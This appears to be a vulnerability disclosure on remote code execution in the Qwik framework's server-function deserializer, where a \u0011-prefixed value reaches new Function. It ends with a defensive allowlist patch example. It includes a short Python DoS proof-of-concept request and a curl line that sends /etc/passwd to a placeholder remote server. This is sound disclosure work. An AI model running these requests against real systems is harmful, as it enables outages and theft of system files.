  • pureServerFunction runs the ev.parseBody function when all of the following conditions hold:
  1. qfunc is defined in the query string
  2. the X-QRL header == qfunc in the query string
  3. Content-Type == application/qwik-json
async function pureServerFunction(ev) {
  const fn = ev.query.get(QFN_KEY); // var QFN_KEY = "qfunc";
  if (fn && ev.request.headers.get("X-QRL") === fn && ev.request.headers.get("Content-Type") === "application/qwik-json") {
    ev.exit();
    const qwikSerializer = ev[RequestEvQwikSerializer];
    const data = await ev.parseBody();
    if (Array.isArray(data)) {
      const [qrl, ...args] = data;
      if (isQrl(qrl) && qrl.getHash() === fn) {
        const result = await qrl.apply(ev, args);
        verifySerializable(qwikSerializer, result, qrl);
        ev.headers.set("Content-Type", "application/qwik-json");
        ev.send(200, await qwikSerializer._serializeData(result, true));
        return;
      }
    }
    throw ev.error(500, "Invalid request");
  }
}
  • In the SSR case this is a DoS (PoC):
import sys
import requests

host = sys.argv[1]
headers = {"Origin": host, "X-QRL": "1", "Content-Type": "application/qwik-json"}
response = requests.post(f'{host}/q-data.json?qfunc=1', headers=headers)
print(response.text)
  • When the conditions above are met, execution continues inside ev.parseBody():
function createRequestEvent(serverRequestEv, loadedRoute, requestHandlers, trailingSlash = true, basePathname = "/", qwikSerializer, resolved) {
	// skip
	parseBody: async () => {
      if (requestData !== void 0) {
        return requestData;
      }
      return requestData = parseRequest(requestEv.request, sharedMap, qwikSerializer);
    },
	// skip
}

// skip

var parseRequest = async (request, sharedMap, qwikSerializer) => {
  var _a2;
  const req = request.clone();
  const type = ((_a2 = request.headers.get("content-type")) == null ? void 0 : _a2.split(/[;,]/, 1)[0].trim()) ?? "";
  if (type === "application/x-www-form-urlencoded" || type === "multipart/form-data") {
    const formData = await req.formData();
    sharedMap.set(RequestEvSharedActionFormData, formData);
    return formToObj(formData);
  } else if (type === "application/json") {
    const data = await req.json();
    return data;
  } else if (type === "application/qwik-json") {
    return qwikSerializer._deserializeData(await req.text());
  }
  return void 0;
};
  • If requestData is undefined, the request is handed to parseRequest.
  • Because the content-type is application/qwik-json, qwikSerializer._deserializeData is called.
// qwik/core.mjs
const _deserializeData = (data, element) => {
    const obj = JSON.parse(data);
    if (typeof obj !== 'object') {
        return null;
    }
    const { _objs, _entry } = obj;
    if (typeof _objs === 'undefined' || typeof _entry === 'undefined') {
        return null;
    }
    let doc = {};
    let containerState = {};
    if (element && isQwikElement(element)) {
        const containerEl = getWrappingContainer(element);
        if (containerEl) {
            containerState = _getContainerState(containerEl);
            doc = containerEl.ownerDocument;
        }
    }
    const parser = createParser(containerState, doc);
    reviveValues(_objs, parser);
    const getObject = (id) => _objs[strToInt(id)];
    for (const obj of _objs) {
        reviveNestedObjects(obj, getObject, parser);
    }
    return getObject(_entry);
};
  • This function creates a Parser for deserialization and calls reviveValues.
  • The Parser has three functions: prepare, subs and fill.
const createParser = (containerState, doc) => {
    const fillMap = new Map();
    const subsMap = new Map();
    return {
        prepare(data) {
					// skip
        },
        subs(obj, subs) {
					// skip
        },
        fill(obj, getObject) {
					// skip
        },
    };
};
  • reviveValues, shown below, calls the parser's prepare function for every _objs element whose type is "string" and whose value is not "\u0001":
const reviveValues = (objs, parser) => {
    for (let i = 0; i < objs.length; i++) {
        const value = objs[i];
        if (isString(value)) {
            objs[i] = value === UNDEFINED_PREFIX ? undefined : parser.prepare(value); // UNDEFINED_PREFIX = "\\u0001"
        }
    }
};
  • prepare uses the first byte of the _objs value as a prefix and looks for a serializer with a matching prefix.
  • If a matching serializer exists, it calls that serializer's prepare function with the value from the second byte onwards as the first argument.
prepare(data) {
    for (const s of serializers) {
        const prefix = s.prefix;
        if (data.startsWith(prefix)) {
            const value = s.prepare(data.slice(prefix.length), containerState, doc);
            if (s.fill) {
                fillMap.set(value, s);
            }
            if (s.subs) {
                subsMap.set(value, s);
            }
            return value;
        }
    }
    return data;
}
  • The list of serializers is as follows; each one defines its own prefix value.
// qwik/core.mjs
const serializers = [
    QRLSerializer,
    SignalSerializer,
    SignalWrapperSerializer,
    WatchSerializer,
    ResourceSerializer,
    URLSerializer,
    DateSerializer,
    RegexSerializer,
    ErrorSerializer,
    DocumentSerializer,
    ComponentSerializer,
    PureFunctionSerializer,
    NoFiniteNumberSerializer,
    URLSearchParamsSerializer,
    FormDataSerializer,
];
  • Of these, look at PureFunctionSerializer:
const PureFunctionSerializer = {
    prefix: '\\u0011',
    test: (obj) => typeof obj === 'function' && obj.__qwik_serializable__ !== undefined,
    serialize: (obj) => {
        return obj.toString();
    },
    prepare: (data) => {
        const fn = new Function('return ' + data)();
        fn.__qwik_serializable__ = true;
        return fn;
    },
    fill: undefined,
};
  • Its prefix is \u0011, and its prepare function passes the argument value to new Function.
  • This makes remote command execution possible.
    • The exploit is not public; please contact me separately.
    • command
      • curl -F"a=@/etc/passwd" http://[remote_server]

Patch method
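The post leaves this section empty. The root cause above is that a control-character prefix in a request body selects the serializer, and the \u0011 prefix hands the rest of the string to new Function. As an added example, not Qwik's code or its actual patch, the JavaScript below deserializes the same _objs/_entry envelope but revives only an allowlist of data-only serializers and refuses any other control-character prefix with an error, which a request handler can turn into a 400 and a log line instead of executing anything. Only \u0001 (UNDEFINED_PREFIX) and \u0011 (PureFunctionSerializer's prefix) come from the post; the two data prefixes (\u0002, \u0003), the decimal _entry index, the nested-object handling and the safeParseBody wrapper are this example's own assumptions.

```javascript
// Added example, not Qwik code: allowlist-based revival of an _objs/_entry body.
const UNDEFINED_PREFIX = "\u0001"; // UNDEFINED_PREFIX in qwik/core.mjs (quoted in the post)
const FUNCTION_PREFIX = "\u0011";  // PureFunctionSerializer.prefix (quoted in the post)

// Hypothetical data-only revivers for this example. The prefix bytes are NOT
// Qwik's; only the shape (one control character, then the payload) is.
const DATA_SERIALIZERS = [
  { name: "url", prefix: "\u0002", prepare: (d) => new URL(d) },
  { name: "date", prefix: "\u0003", prepare: (d) => new Date(d) },
];

class UnsafeSerializedValue extends Error {}

// Revive one string slot of _objs. Ordinary strings pass through untouched,
// allowlisted prefixes are decoded, and any other control-character prefix
// (the function prefix included) is rejected rather than revived or
// silently passed along, so the rejection can be logged.
function reviveString(value) {
  if (value === UNDEFINED_PREFIX) return undefined;
  if (value.length === 0 || value.charCodeAt(0) >= 0x20) return value;
  for (const s of DATA_SERIALIZERS) {
    if (value.startsWith(s.prefix)) return s.prepare(value.slice(s.prefix.length));
  }
  const hex = value.charCodeAt(0).toString(16).padStart(2, "0");
  const what = value.startsWith(FUNCTION_PREFIX) ? "function payload" : "unknown serializer";
  throw new UnsafeSerializedValue(`refused ${what} (prefix 0x${hex})`);
}

// Parse the envelope, revive top-level strings only (nested objects are kept
// as plain JSON, never evaluated), and return the entry object.
function deserializeUntrusted(text) {
  const obj = JSON.parse(text);
  if (obj === null || typeof obj !== "object" || !Array.isArray(obj._objs) || typeof obj._entry !== "string") {
    throw new UnsafeSerializedValue("malformed _objs/_entry envelope");
  }
  const objs = obj._objs.map((v) => (typeof v === "string" ? reviveString(v) : v));
  // Decimal index in this example; Qwik encodes the entry reference its own way.
  const entry = Number.parseInt(obj._entry, 10);
  if (!Number.isInteger(entry) || entry < 0 || entry >= objs.length) {
    throw new UnsafeSerializedValue("_entry out of range");
  }
  return objs[entry];
}

// What a request handler would call in place of parseBody: never throws,
// returns a result it can map to 200 or 400 and log on rejection.
function safeParseBody(text) {
  try {
    return { ok: true, value: deserializeUntrusted(text) };
  } catch (e) {
    const reason = e instanceof UnsafeSerializedValue ? e.message : `unparseable body: ${e.message}`;
    return { ok: false, reason };
  }
}

module.exports = { reviveString, deserializeUntrusted, safeParseBody, UnsafeSerializedValue };
```

Note that the Origin check in securityMiddleware offers no protection here: the PoC above sets the Origin header itself, so the only effective control is to never turn body content into code, which is what the allowlist enforces.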
